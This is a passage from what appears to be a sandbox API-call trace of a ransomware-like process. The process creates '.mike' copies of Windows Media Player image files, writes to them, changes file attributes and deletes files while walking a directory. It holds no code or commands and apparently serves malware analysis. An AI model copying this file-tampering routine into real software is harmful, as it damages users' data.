Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.055] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.055] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.jpg.mike")) returned 1 [0101.056] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", lpFilePart=0x0) returned 0x45 [0101.056] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", lpFilePart=0x0) returned 0x45 [0101.056] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", lpFilePart=0x0) returned 0x45 [0101.058] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", lpFilePart=0x0) returned 0x4a [0101.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", lpFilePart=0x0) returned 0x45 [0101.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", lpFilePart=0x0) returned 0x4a [0101.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", lpFilePart=0x0) returned 0x4a [0101.059] WriteFile (in: hFile=0x288, lpBuffer=0x214b60c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x214b60c*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.060] CloseHandle (hObject=0x288) returned 1 [0101.060] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0101.060] ReadFile (in: hFile=0x288, lpBuffer=0x214c738, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x214c738*, lpNumberOfBytesRead=0x2af110*=0x101c, lpOverlapped=0x0) returned 1 [0101.062] CloseHandle (hObject=0x288) returned 1 [0101.062] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", lpFilePart=0x0) returned 0x4a [0101.064] WriteFile (in: hFile=0x288, lpBuffer=0x21578b0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21578b0*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.064] CloseHandle (hObject=0x288) returned 1 [0101.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", lpFilePart=0x0) returned 0x45 [0101.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", lpFilePart=0x0) returned 0x4a [0101.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", lpFilePart=0x0) returned 0x4a [0101.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", dwFileAttributes=0x80) returned 0 [0101.065] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", lpFilePart=0x0) returned 0x45 [0101.065] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", lpFilePart=0x0) returned 0x4a [0101.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike", lpFilePart=0x0) returned 0x4a [0101.066] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.png.mike")) returned 1 [0101.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg", lpFilePart=0x0) returned 0x49 [0101.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg", lpFilePart=0x0) returned 0x49 [0101.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.069] WriteFile (in: hFile=0x288, lpBuffer=0x215cf98*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x215cf98*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.070] CloseHandle (hObject=0x288) returned 1 [0101.073] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.074] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.075] WriteFile (in: hFile=0x288, lpBuffer=0x217dcb0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x217dcb0*, lpNumberOfBytesWritten=0x2af104*=0x790, lpOverlapped=0x0) returned 1 [0101.075] CloseHandle (hObject=0x288) returned 1 [0101.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.077] WriteFile (in: hFile=0x288, lpBuffer=0x2180ef0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2180ef0*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.077] CloseHandle (hObject=0x288) returned 1 [0101.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg", lpFilePart=0x0) returned 0x49 [0101.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg", dwFileAttributes=0x80) returned 0 [0101.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike", lpFilePart=0x0) returned 0x4e [0101.079] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color120.jpg.mike")) returned 1 [0101.080] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png", lpFilePart=0x0) returned 0x49 [0101.081] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", lpFilePart=0x0) returned 0x4e [0101.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png", lpFilePart=0x0) returned 0x49 [0101.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", lpFilePart=0x0) returned 0x4e [0101.082] WriteFile (in: hFile=0x288, lpBuffer=0x2186020*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2186020*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.084] CloseHandle (hObject=0x288) returned 1 [0101.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", lpFilePart=0x0) returned 0x4e [0101.308] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", lpFilePart=0x0) returned 0x4e [0101.308] WriteFile (in: hFile=0x288, lpBuffer=0x2199bd0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2199bd0*, lpNumberOfBytesWritten=0x2af104*=0x750, lpOverlapped=0x0) returned 1 [0101.308] CloseHandle (hObject=0x288) returned 1 [0101.308] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike", lpFilePart=0x0) returned 0x4e [0101.310] WriteFile (in: hFile=0x288, lpBuffer=0x219ce10*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x219ce10*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.310] CloseHandle (hObject=0x288) returned 1 [0101.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png", dwFileAttributes=0x80) returned 0 [0101.312] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color120.png.mike")) returned 1 [0101.316] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.316] WriteFile (in: hFile=0x288, lpBuffer=0x21a4710*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21a4710*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.317] CloseHandle (hObject=0x288) returned 1 [0101.321] WriteFile (in: hFile=0x288, lpBuffer=0x21b85f8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21b85f8*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.321] CloseHandle (hObject=0x288) returned 1 [0101.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg", dwFileAttributes=0x80) returned 0 [0101.323] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color32.jpg.mike")) returned 1 [0101.326] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.326] WriteFile (in: hFile=0x288, lpBuffer=0x21bfed4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21bfed4*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.327] CloseHandle (hObject=0x288) returned 1 [0101.330] WriteFile (in: hFile=0x288, lpBuffer=0x21d29f4*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21d29f4*, lpNumberOfBytesWritten=0x2af104*=0x490, lpOverlapped=0x0) returned 1 [0101.331] CloseHandle (hObject=0x288) returned 1 [0101.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg", dwFileAttributes=0x80) returned 0 [0101.333] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.jpg.mike")) returned 1 [0101.336] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.348] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png", dwFileAttributes=0x80) returned 0 [0101.349] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.png.mike")) returned 1 [0101.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5b0dbe0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x5b33d40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf365935, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf365935, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2c7e17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x152e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConnectionManager.xml", cAlternateFileName="")) returned 1 [0101.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf365935, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf365935, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2c7e17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2092, dwReserved0=0x0, dwReserved1=0x0, cFileName="ContentDirectory.xml", cAlternateFileName="")) returned 1 [0101.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MediaReceiverRegistrar.xml", cAlternateFileName="")) returned 1 [0101.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5352, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw120.jpg", cAlternateFileName="")) returned 1 [0101.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1922, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw120.png", cAlternateFileName="")) returned 1 [0101.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3b1bef, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3b1bef, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw32.bmp", cAlternateFileName="")) returned 1 [0101.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3b1bef, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3b1bef, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x231f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw32.jpg", cAlternateFileName="")) returned 1 [0101.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3d7d4c, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3d7d4c, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x980, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.bmp", cAlternateFileName="")) returned 1 [0101.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.jpg", cAlternateFileName="")) returned 1 [0101.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x101c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.png", cAlternateFileName="")) returned 1 [0101.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5788, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color120.jpg", cAlternateFileName="")) returned 1 [0101.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf424006, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf424006, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2f4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color120.png", cAlternateFileName="")) returned 1 [0101.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, 